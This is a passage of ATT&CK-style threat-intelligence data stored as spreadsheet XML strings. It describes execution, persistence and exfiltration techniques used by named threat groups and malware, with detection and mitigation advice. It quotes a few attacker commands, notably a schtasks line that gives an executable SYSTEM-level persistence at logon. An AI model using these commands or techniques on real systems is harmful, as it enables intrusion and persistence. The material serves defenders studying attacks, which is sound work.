    <t>It may be possible to remove PowerShell from systems when not needed, but a review should be performed to assess the impact to an environment, since it could be in use for many legitimate purposes and administrative functions. When PowerShell is necessary, restrict PowerShell execution policy to administrators and to only execute signed scripts. Be aware that there are methods of bypassing the PowerShell execution policy, depending on environment configuration.[[CiteRef::Netspi PowerShell Execution Policy Bypass]] Disable/restrict the WinRM Service to help prevent uses of PowerShell for remote execution.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1086</t>
  </si>
  <si>
    <t>[[Software/S0151|HALFBAKED]] can use WMI queries to gather system information.[[CiteRef::FireEye FIN7 April 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0045|menuPass]] uses a modified version of pentesting script wmiexec.vbs, which logs into a remote machine using WMI.[[CiteRef::PWC Cloud Hopper Technical Annex April 2017]][[CiteRef::Github AD-Pentest-Script]]</t>
  </si>
  <si>
    <t>[[Group/G0032|Lazarus Group]] malware SierraAlfa uses the Windows Management Instrumentation Command-line application wmic to start itself on a target system during lateral movement.[[CiteRef::Novetta Blockbuster RATs]]</t>
  </si>
  <si>
    <t>An [[Group/G0022|APT3]] downloader uses the Windows command &lt;code&gt;"cmd.exe" /C whoami&lt;/code&gt;.[[CiteRef::FireEye Operation Double Tap]] The group also uses a tool to execute commands on remote computers.[[CiteRef::Symantec Buckeye]]</t>
  </si>
  <si>
    <t>[[Software/S0056|Net Crawler]] uses [[Software/S0029|PsExec]] to perform remote service manipulation to execute a copy of itself as part of lateral movement.[[CiteRef::Cylance Cleaver]]</t>
  </si>
  <si>
    <t>[[Software/S0034|NETEAGLE]] allows adversaries to execute shell commands on the infected host.[[CiteRef::FireEye APT30]]</t>
  </si>
  <si>
    <t>A module in [[Software/S0046|CozyCar]] allows arbitrary commands to be executed by invoking &lt;code&gt;C:\Windows\System32\cmd.exe&lt;/code&gt;.[[CiteRef::F-Secure CozyDuke]]</t>
  </si>
  <si>
    <t>[[Software/S0045|ADVSTORESHELL]] can create a remote shell and run a given command.[[CiteRef::ESET Sednit Part 2]][[CiteRef::Bitdefender APT28 Dec 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0139|PowerDuke]] runs &lt;code&gt;cmd.exe /c&lt;/code&gt; and sends the output to its C2.[[CiteRef::Volexity PowerDuke November 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0053|SeaDuke]] is capable of executing commands.[[CiteRef::Unit 42 SeaDuke 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]] can use [[Software/S0029|PsExec]] to execute a payload on a remote host.[[CiteRef::cobaltstrike manual]] It can also use Service Control Manager to start new services.[[CiteRef::Cobalt Strike TTPs Dec 2017]]</t>
  </si>
  <si>
    <t>Software: xCmd</t>
  </si>
  <si>
    <t>[[Software/S0123|xCmd]] can be used to execute binaries on remote systems by creating and starting a service.[[CiteRef::xCmd]]</t>
  </si>
  <si>
    <t>[[Software/S0117|XTunnel]] has been used to execute remote commands.[[CiteRef::Crowdstrike DNC June 2016]]</t>
  </si>
  <si>
    <t>Following exploitation with [[Software/S0042|LOWBALL]] malware, [[Group/G0018|admin@338]] actors created a file containing a list of commands to be executed on the compromised computer.[[CiteRef::FireEye admin@338]]</t>
  </si>
  <si>
    <t>Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with [[Technique/T1050|New Service]] and [[Technique/T1031|Modify Existing Service]] during service persistence or privilege escalation.</t>
  </si>
  <si>
    <t>[[Software/S0069|BLACKCOFFEE]] has the capability to create a reverse shell.[[CiteRef::FireEye APT17]]</t>
  </si>
  <si>
    <t>[[Group/G0006|APT1]] has used the Windows command shell to execute commands.[[CiteRef::Mandiant APT1]]</t>
  </si>
  <si>
    <t>Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB)[[CiteRef::Wikipedia SMB]] and Remote Procedure Call Service (RPCS)[[CiteRef::TechNet RPC]] for remote access. RPCS operates over port 135.[[CiteRef::MSDN WMI]]
An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for [[Discovery]] and remote [[Execution]] of files as part of [[Lateral Movement]].[[CiteRef::FireEye WMI 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0023|CHOPSTICK]] is capable of performing remote command execution.[[CiteRef::Crowdstrike DNC June 2016]][[CiteRef::ESET Sednit Part 2]]</t>
  </si>
  <si>
    <t>[[Group/G0007|APT28]] has delivered [[Software/S0044|JHUHUGIT]] by executing PowerShell commands through DDE in Word documents. [[CiteRef::McAfee APT28 DDE1 Nov 2017]][[CiteRef::McAfee APT28 DDE2 Nov 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0046|FIN7]] spear phishing campaigns have included malicious Word documents with DDE execution.[[CiteRef::CyberScoop FIN7 Oct 2017]]</t>
  </si>
  <si>
    <t>Software: hcdLoader</t>
  </si>
  <si>
    <t>[[Software/S0071|hcdLoader]] provides command-line access to the compromised system.[[CiteRef::Dell Lateral Movement]]</t>
  </si>
  <si>
    <t>[[Software/S0124|Pisloader]] uses cmd.exe to set the Registry Run key value. It also has a command to spawn a command shell.[[CiteRef::Palo Alto DNS Requests]]</t>
  </si>
  <si>
    <t>[[Group/G0035|Dragonfly]] has used PowerShell.[[CiteRef::Symantec Dragonfly Sept 2017]][[CiteRef::US-CERT APT Energy Oct 2017]]</t>
  </si>
  <si>
    <t>One version of [[Software/S0170|Helminth]] uses a PowerShell script.[[CiteRef::Palo Alto OilRig May 2016]]</t>
  </si>
  <si>
    <t>[[Group/G0051|FIN10]] uses PowerShell for execution as well as PowerShell Empire to establish persistence.[[CiteRef::FireEye FIN10 June 2017]][[CiteRef::Github PowerShell Empire]]</t>
  </si>
  <si>
    <t>[[Group/G0038|Stealth Falcon]] malware uses PowerShell commands to perform various functions, including gathering system information via WMI and executing commands from its C2 server.[[CiteRef::Citizen Lab Stealth Falcon May 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0151|HALFBAKED]] can execute PowerShell scripts.[[CiteRef::FireEye FIN7 April 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0037|FIN6]] has used a Metasploit PowerShell module to download and execute shellcode and to set up a local listener.[[CiteRef::FireEye FIN6 April 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0161|XAgentOSX]] contains the execFile function to execute a specified file on the system using the NSTask:launch method.[[CiteRef::XAgentOSX]]</t>
  </si>
  <si>
    <t>[[Software/S0013|PlugX]] can use the Windows API function CreateProcess to execute another process.[[CiteRef::Lastline PlugX Analysis]]</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]]'s "beacon" payload is capable of running shell commands without &lt;code&gt;cmd.exe&lt;/code&gt; and PowerShell commands without &lt;code&gt;powershell.exe&lt;/code&gt;[[CiteRef::cobaltstrike manual]]</t>
  </si>
  <si>
    <t>[[Software/S0045|ADVSTORESHELL]] is capable of starting a process using CreateProcess.[[CiteRef::Bitdefender APT28 Dec 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0184|POWRUNER]] is written in PowerShell.[[CiteRef::FireEye APT34 Dec 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0129|AutoIt backdoor]] downloads a PowerShell script that decodes to a typical shellcode loader.[[CiteRef::Forcepoint Monsoon]]</t>
  </si>
  <si>
    <t>[[Group/G0060|BRONZE BUTLER]] has used PowerShell for execution.[[CiteRef::Secureworks BRONZE BUTLER Oct 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0057|APT34]] has used PowerShell scripts for execution.[[CiteRef::FireEye APT34 Dec 2017]]</t>
  </si>
  <si>
    <t>The [[Group/G0033|Poseidon Group]]'s Information Gathering Tool (IGT) includes PowerShell components.[[CiteRef::Kaspersky Poseidon Group]]</t>
  </si>
  <si>
    <t>[[Group/G0059|Magic Hound]] has used PowerShell for execution.[[CiteRef::Unit 42 Magic Hound Feb 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0046|FIN7]] uses a PowerShell script to launch shellcode that retrieves an additional payload.[[CiteRef::FireEye FIN7 April 2017]][[CiteRef::Morphisec FIN7 June 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0040|Patchwork]] used PowerSploit to download and run a reverse shell.[[CiteRef::Cymmetria Patchwork]]</t>
  </si>
  <si>
    <t>[[Group/G0045|menuPass]] uses PowerSploit to inject shellcode into PowerShell.[[CiteRef::PWC Cloud Hopper Technical Annex April 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0050|APT32]] has used PowerShell-based tools and shellcode loaders for execution.[[CiteRef::FireEye APT32 May 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]] can execute a payload on a remote host with PowerShell.  This technique does write any data to disk.[[CiteRef::cobaltstrike manual]]</t>
  </si>
  <si>
    <t>[[Software/S0150|POSHSPY]] uses PowerShell to execute various commands, one to execute its payload.[[CiteRef::FireEye POSHSPY April 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0016|APT29]] has used encoded PowerShell scripts uploaded to [[Software/S0046|CozyCar]] installations to download and install [[Software/S0053|SeaDuke]].[[CiteRef::Symantec Seaduke 2015]] [[Group/G0016|APT29]] also used PowerShell scripts to evade defenses.[[CiteRef::Mandiant No Easy Breach]]</t>
  </si>
  <si>
    <t>[[Software/S0145|POWERSOURCE]] is a PowerShell backdoor.[[CiteRef::FireEye FIN7 March 2017]][[CiteRef::Cisco DNSMessenger March 2017]]</t>
  </si>
  <si>
    <t>uses PowerShell for execution.[[CiteRef::ClearSky Charming Kitten Dec 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0027|Threat Group-3390]] has used PowerShell for execution.[[CiteRef::SecureWorks BRONZE UNION June 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0052|CopyKittens]] has used PowerShell Empire.[[CiteRef::ClearSky Wilted Tulip July 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0037|HAMMERTOSS]] is known to use PowerShell.[[CiteRef::FireEye APT29]]</t>
  </si>
  <si>
    <t>[[Software/S0128|BADNEWS]] has a command to download an .exe and execute it via CreateProcess API.[[CiteRef::Forcepoint Monsoon]]</t>
  </si>
  <si>
    <t>Execution,Lateral Movement</t>
  </si>
  <si>
    <t>Third-party Software</t>
  </si>
  <si>
    <t>Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, Altiris, etc.). If an adversary gains access to these systems, then they may be able to execute code.
Adversaries may gain access to and use third-party application deployment systems installed within an enterprise network. Access to a network-wide or enterprise-wide software deployment system enables an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.
The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the deployment server, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform software deployment.</t>
  </si>
  <si>
    <t>Binary file metadata,File monitoring,Process monitoring,Process use of network,Third-party application logs,Windows Registry</t>
  </si>
  <si>
    <t>Detection methods will vary depending on the type of third-party software or system and how it is typically used. 
The same investigation process can be applied here as with other potentially malicious activities where the distribution vector is initially unknown but the resulting activity follows a discernible pattern. Analyze the process execution trees, historical activities from the third-party application (such as what types of files are usually pushed), and the resulting activities or events from the file/binary/script pushed to systems. 
Often these third-party applications will have logs of their own that can be collected and correlated with other data from the environment. Audit software deployment logs and look for suspicious or unauthorized activity. A system not typically used to push software to clients that suddenly is used for such a task outside of a known admin function may be suspicious.
Perform application deployment at regular times so that irregular deployment activity stands out. Monitor process activity that does not correlate to known good software. Monitor account login activity on the deployment system. ,</t>
  </si>
  <si>
    <t>Evaluate the security of third-party software that could be used to deploy or execute programs. Ensure that access to management systems for deployment systems is limited, monitored, and secure. Have a strict approval policy for use of deployment systems.
Grant access to application deployment systems only to a limited number of authorized administrators. Ensure proper system and access isolation for critical network systems through use of firewalls, account privilege separation, group policy, and multifactor authentication. Verify that account credentials that may be used to access deployment systems are unique and not used throughout the enterprise network. Patch deployment systems regularly to prevent potential remote access through [[Technique/T1068|Exploitation of Vulnerability]]. 
If the application deployment system can be configured to deploy only signed binaries, then ensure that the trusted signing certificates are not co-located with the application deployment system and are instead located on a system that cannot be accessed remotely or to which remote access is tightly controlled.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1072</t>
  </si>
  <si>
    <t>Windows Remote Management</t>
  </si>
  <si>
    <t>Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).[[CiteRef::Microsoft WinRM]] It may be called with the &lt;code&gt;winrm&lt;/code&gt; command or by any number of programs such as PowerShell.[[CiteRef::Jacobsen 2014]]</t>
  </si>
  <si>
    <t>File monitoring,Authentication logs,Netflow/Enclave netflow,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Monitor use of WinRM within an environment by tracking service execution. If it is not normally used or is disabled, then this may be an indicator of suspicious behavior. Monitor processes created and actions taken by the WinRM process or a WinRM invoked script to correlate it with other related events. ,</t>
  </si>
  <si>
    <t>Disable the WinRM service. If the service is necessary, lock down critical enclaves with separate WinRM infrastructure, accounts, and permissions. Follow WinRM best practices on configuration of authentication methods and use of host firewalls to restrict WinRM access to allow communication only to/from specific devices.[[CiteRef::NSA Spotting]]</t>
  </si>
  <si>
    <t>WinRM listener turned on and configured on remote system</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1028</t>
  </si>
  <si>
    <t>[[Group/G0028|Threat Group-1314]] actors used a victim's endpoint management platform, Altiris, for lateral movement.[[CiteRef::Dell TG-1314]]</t>
  </si>
  <si>
    <t>AppleScript</t>
  </si>
  <si>
    <t>macOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC). These messages can be easily scripted with AppleScript for local or remote IPC. Osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the &lt;code&gt;osalang&lt;/code&gt; program.
AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely. 
Adversaries can use this to interact with open SSH connection, move to remote machines, and even present users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they're already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via python [[CiteRef::Macro Malware Targets Macs]]. Scripts can be run from the command lie via &lt;code&gt;osascript /path/to/script&lt;/code&gt; or &lt;code&gt;osascript -e "script here"&lt;/code&gt;.</t>
  </si>
  <si>
    <t>API monitoring,System calls,Process Monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Monitor for execution of AppleScript through osascript that may be related to other suspicious behavior occurring on the system. ,</t>
  </si>
  <si>
    <t>Require that all AppleScript be signed by a trusted developer ID before being executed - this will prevent random AppleScript code from executing.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1155</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]] can use &lt;code&gt;WinRM&lt;/code&gt; to execute a payload on a remote host.[[CiteRef::cobaltstrike manual]]</t>
  </si>
  <si>
    <t>[[Group/G0027|Threat Group-3390]] has used WinRM to enable remote execution.[[CiteRef::SecureWorks BRONZE UNION June 2017]]</t>
  </si>
  <si>
    <t>Execution,Persistence</t>
  </si>
  <si>
    <t>LSASS Driver</t>
  </si>
  <si>
    <t>The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.[[CiteRef:: Microsoft Security Subsystem]]
Adversaries may target lsass.exe drivers to obtain execution and/or persistence. By either replacing or adding illegitimate drivers (e.g., [[Technique/T1073|DLL Side-Loading]] or [[Technique/T1038|DLL Search Order Hijacking]]), an adversary can achieve arbitrary code execution triggered by continuous LSA operations.</t>
  </si>
  <si>
    <t>API monitoring,DLL monitoring,File monitoring,Kernel drivers,Loaded DLLs,Process Monitoring</t>
  </si>
  <si>
    <t>With LSA Protection enabled, monitor the event logs (Events 3033 and 3063) for failed attempts to load LSA plug-ins and drivers.[[CiteRef::Microsoft LSA Protection Mar 2014]]
Utilize the Sysinternals Autoruns/Autorunsc utility[[CiteRef::TechNet Autoruns]] to examine loaded drivers associated with the LSA.
Utilize the Sysinternals Process Monitor utility to monitor DLL load operations in lsass.exe.[[CiteRef::Microsoft DLL Security]] ,</t>
  </si>
  <si>
    <t>On Windows 8.1 and Server 2012 R2, enable LSA Protection by setting the Registry key &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL&lt;/code&gt; to &lt;code&gt;dword:00000001&lt;/code&gt;.[[CiteRef::Microsoft LSA Protection Mar 2014]] LSA Protection ensures that LSA plug-ins and drivers are only loaded if they are digitally signed with a Microsoft signature and adhere to the Microsoft Security Development Lifecycle (SDL) process guidance.
On Windows 10 and Server 2016, enable Windows Defender Credential Guard[[CiteRef::Microsoft Enable Cred Guard April 2017]] to run lsass.exe in an isolated virtualized environment without any device drivers.[[CiteRef::Microsoft Credential Guard April 2017]]
Ensure safe DLL search mode is enabled &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode&lt;/code&gt; to mitigate risk that lsass.exe loads a malicious code library.[[CiteRef::Microsoft DLL Security]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1177</t>
  </si>
  <si>
    <t>Trap</t>
  </si>
  <si>
    <t>The &lt;code&gt;trap&lt;/code&gt; command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common  keyboard interrupts like &lt;code&gt;ctrl+c&lt;/code&gt; and &lt;code&gt;ctrl+d&lt;/code&gt;. Adversaries can use this to register code to be executed when the shell encounters specific interrupts either to gain execution or as a persistence mechanism. Trap commands are of the following format &lt;code&gt;trap 'command list' signals&lt;/code&gt; where "command list" will be executed when "signals" are received.</t>
  </si>
  <si>
    <t>Trap commands must be registered for the shell or programs, so they appear in files. Monitoring files for suspicious or overly broad trap commands can narrow down suspicious behavior during an investigation. Monitor for suspicious processes executed through trap interrupts. ,</t>
  </si>
  <si>
    <t>Due to potential legitimate uses of trap commands, it's may be difficult to mitigate use of this technique.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1154</t>
  </si>
  <si>
    <t>drops a malicious file (sspisrv.dll) alongside a copy of lsass.exe, which is used to register a service that loads sspisrv.dll as a driver. The payload of the malicious driver (located in its entry-point function) is executed when loaded by lsass.exe before the spoofed service becomes unstable and crashes.[[CiteRef::Microsoft SIR Vol 21]][[CiteRef::Microsoft Wingbird Nov 2017]]</t>
  </si>
  <si>
    <t>Execution,Persistence,Privilege Escalation</t>
  </si>
  <si>
    <t>Scheduled Task</t>
  </si>
  <si>
    <t>[[Software/S0148|RTM]] tries to add a scheduled task to establish persistence.[[CiteRef::ESET RTM Feb 2017]]</t>
  </si>
  <si>
    <t>File monitoring,Process command-line parameters,Process monitoring,Windows event logs</t>
  </si>
  <si>
    <t>Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Monitor process execution from the &lt;code&gt;svchost.exe&lt;/code&gt; in Windows 10 and the Windows Task Scheduler &lt;code&gt;taskeng.exe&lt;/code&gt; for older versions of Windows.[[CiteRef::Twitter Leoloobeek Scheduled Task]] If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in &lt;code&gt;%systemroot%\System32\Tasks&lt;/code&gt; for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for [[Command and Control]], learning details about the environment through [[Discovery]], and [[Lateral Movement]].
Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service.[[CiteRef::TechNet Forum Scheduled Task Operational Setting]] Several events will then be logged on scheduled task activity, including:[[CiteRef::TechNet Scheduled Task Events]]
*Event ID 106 - Scheduled task registered
*Event ID 140 - Scheduled task updated
*Event ID 141 - Scheduled task removed
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks.[[CiteRef::TechNet Autoruns]] Look for changes to tasks that do not correlate with known software, patch cycles, etc. Suspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data.
Monitor processes and command-line arguments for actions that could be taken to create tasks. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as [[Technique/T1047|Windows Management Instrumentation]] and [[Technique/T1086|PowerShell]], so additional logging may need to be configured to gather the appropriate data. ,</t>
  </si>
  <si>
    <t>Limit privileges of user accounts and remediate [[Privilege Escalation]] vectors so only authorized administrators can create scheduled tasks. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for permission weaknesses in scheduled tasks that could be used to escalate privileges.[[CiteRef::Powersploit]]
Configure settings for scheduled tasks to force tasks to run under the context of the authenticated account instead of allowing them to run as SYSTEM. The associated Registry key is located at &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\SubmitControl&lt;/code&gt;. The setting can be configured through GPO: Computer Configuration &gt; [Policies] &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; Security Options: Domain Controller: Allow server operators to schedule tasks, set to disabled.[[CiteRef::TechNet Server Operator Scheduled Task]]
Configure the Increase Scheduling Priority option to only allow the Administrators group the rights to schedule a priority process. This can be can be configured through GPO: Computer Configuration &gt; [Policies] &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment: Increase scheduling priority.[[CiteRef::TechNet Scheduling Priority]]
Identify and block unnecessary system utilities or potentially malicious software that may be used to schedule tasks using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Travis Smith, Tripwire,Leo Loobeek, @leoloobeek</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1053</t>
  </si>
  <si>
    <t>[[Software/S0170|Helminth]] has used a scheduled task for persistence.[[CiteRef::ClearSky OilRig Jan 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0050|APT32]] has used scheduled tasks to persist on victim systems.[[CiteRef::FireEye APT32 May 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0037|FIN6]] has used scheduled tasks to establish persistence for various malware it uses, including downloaders known as HARDTACK and SHIPBREAD and PoS malware known as TRINITY.[[CiteRef::FireEye FIN6 April 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0125|Remsec]] schedules the execution one of its modules by creating a new scheduler task.[[CiteRef::Kaspersky ProjectSauron Technical Analysis]]</t>
  </si>
  <si>
    <t>[[Group/G0038|Stealth Falcon]] malware creates a scheduled task entitled ?IE Web Cache? to execute a malicious file hourly.[[CiteRef::Citizen Lab Stealth Falcon May 2016]]</t>
  </si>
  <si>
    <t>An [[Group/G0022|APT3]] downloader creates persistence by creating the following scheduled task: &lt;code&gt;schtasks /create /tn "mysc" /tr C:\Users\Public\test.exe /sc ONLOGON /ru "System"&lt;/code&gt;.[[CiteRef::FireEye Operation Double Tap]]</t>
  </si>
  <si>
    <t>[[Software/S0147|Pteranodon]] schedules tasks to invoke its components in order to establish persistence.[[CiteRef::Palo Alto Gamaredon Feb 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0046|FIN7]] malware has created scheduled tasks to establish persistence.[[CiteRef::FireEye FIN7 April 2017]][[CiteRef::Morphisec FIN7 June 2017]]</t>
  </si>
  <si>
    <t>can execute commands remotely by creating a new schedule task on the remote system [[CiteRef::Symantec Buckeye]]</t>
  </si>
  <si>
    <t>[[Software/S0189|ISMInjector]] creates scheduled tasks to establish persistence.[[CiteRef::OilRig New Delivery Oct 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0045|menuPass]] has used a script (atexec.py) to execute a command on a target machine via Task Scheduler.[[CiteRef::PWC Cloud Hopper Technical Annex April 2017]]</t>
  </si>
  <si>
    <t>Software: schtasks, schtasks.exe</t>
  </si>
  <si>
    <t>[[Software/S0111|schtasks]] is used to schedule tasks on a Windows system to run at a specific date and time.[[CiteRef::TechNet Schtasks]]</t>
  </si>
  <si>
    <t>Software: at, at.exe</t>
  </si>
  <si>
    <t>[[Software/S0110|at]] can be used to schedule a task on a system.[[CiteRef::TechNet At]]</t>
  </si>
  <si>
    <t>[[Software/S0044|JHUHUGIT]] has registered itself as a scheduled task to run each time the current user logs in.[[CiteRef::ESET Sednit Part 1]][[CiteRef::ESET Sednit July 2015]]</t>
  </si>
  <si>
    <t>Utilities such as [[Software/S0110|at]] and [[Software/S0111|schtasks]], along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. The account used to create the task must be in the Administrators group on the local system. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on.[[CiteRef::TechNet Task Scheduler Security]]
An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote [[Execution]] as part of [[Lateral Movement]], to gain SYSTEM privileges, or to run a process under the context of a specified account.</t>
  </si>
  <si>
    <t>[[Group/G0026|APT18]] actors used the native [[Software/S0110|at]] Windows task scheduler tool to use scheduled tasks for execution on a victim network.[[CiteRef::Dell Lateral Movement]]</t>
  </si>
  <si>
    <t>[[Software/S0184|POWRUNER]] persists through a scheduled task that executes it every minute.[[CiteRef::FireEye APT34 Dec 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0060|BRONZE BUTLER]] has used [[Software/S0110|at]] and [[Software/S0111|schtasks]] to register a scheduled task to execute malware during lateral movement.[[CiteRef::Secureworks BRONZE BUTLER Oct 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0016|APT29]] used named and hijacked scheduled tasks to establish persistence.[[CiteRef::Mandiant No Easy Breach]]</t>
  </si>
  <si>
    <t>[[Software/S0168|Gazer]] can establish persistence by creating a scheduled task. [[CiteRef::ESET Gazer Aug 2017]][[CiteRef::Securelist WhiteBear Aug 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0027|Threat Group-3390]] actors use [[Software/S0110|at]] to schedule tasks to run self-extracting RAR archives, which install [[Software/HTTPBrowser|HTTPBrowser]] or [[Software/PlugX|PlugX]] on other victims on a network.</t>
  </si>
  <si>
    <t>[[Group/G0051|FIN10]] has established persistence by using S4U tasks as well as the Scheduled Task option in PowerShell Empire.[[CiteRef::FireEye FIN10 June 2017]][[CiteRef::Github PowerShell Empire]]</t>
  </si>
  <si>
    <t>One persistence mechanism used by [[Software/S0046|CozyCar]] is to register itself as a scheduled task.[[CiteRef::F-Secure CozyDuke]]</t>
  </si>
  <si>
    <t>[[Group/G0035|Dragonfly]] has used a scheduled task to execute a malicious file.[[CiteRef::US-CERT APT Energy Oct 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0050|CosmicDuke]] uses scheduled tasks typically named "Watchmon Service" for persistence.[[CiteRef::F-Secure Cosmicduke]]</t>
  </si>
  <si>
    <t>Exfiltration</t>
  </si>
  <si>
    <t>Data Compressed</t>
  </si>
  <si>
    <t>[[Group/G0032|Lazarus Group]] malware IndiaIndia saves information gathered about the victim to a file that is compressed with Zlib, encrypted, and uploaded to a C2 server.[[CiteRef::Novetta Blockbuster Loaders]] [[Group/G0032|Lazarus Group]] malware RomeoDelta archives specified directories in .zip format, encrypts the .zip file, and uploads it to its C2 server.[[CiteRef::Novetta Blockbuster RATs]]</t>
  </si>
  <si>
    <t>Compression software and compressed files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known compression utilities. This may yield a significant amount of benign events, depending on how systems in the environment are typically used.
If the communications channel is unencrypted, compressed files can be detected in transit during exfiltration with a network intrusion detection or data loss prevention system analyzing file headers.[[CiteRef::Wikipedia File Header Signatures]] ,</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to compress files, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]
If network intrusion prevention or data loss prevention tools are set to block specific file types from leaving the network over unencrypted channels, then an adversary may move to an encrypted channel.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1002</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol</t>
  </si>
  <si>
    <t>[[Group/G0049|OilRig]] has exfiltrated data over FTP separately from its primary C2 channel over DNS.[[CiteRef::Palo Alto OilRig Oct 2016]]</t>
  </si>
  <si>
    <t>User interface,Process monitoring,Process use of network,Packet capture,Netflow/Enclave netflow,Network protocol analysis</t>
  </si>
  <si>
    <t>Follow best practices for network firewall configurations to allow only necessary ports and traffic to enter and exit the network. For example, if services like FTP are not required for sending information outside of a network, then block FTP-related ports at the network perimeter. Enforce proxies and use dedicated servers for services such as DNS and only allow those systems to communicate over respective ports/protocols, instead of all systems within a network.[[CiteRef::TechNet Firewall Design]] These actions will help reduce command and control and exfiltration path opportunities.
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware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command and control signatures over time or construct protocols in such a way to avoid detection by common defensive tools.[[CiteRef::University of Birmingham C2]]</t>
  </si>
  <si>
